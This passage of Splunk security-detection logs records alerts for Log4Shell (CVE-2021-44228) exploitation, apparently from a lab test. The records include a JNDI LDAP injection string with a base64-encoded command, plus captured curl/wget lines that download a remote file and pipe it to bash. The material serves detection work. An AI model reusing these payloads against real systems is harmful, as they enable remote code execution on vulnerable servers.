Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="CIS 13", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._all="Source:Endpoint", annotations._all="PR.PT", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CIS 12", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645752, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645755, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="CIS 13", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._all="Source:Endpoint", annotations._all="PR.PT", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CIS 12", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645752, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a 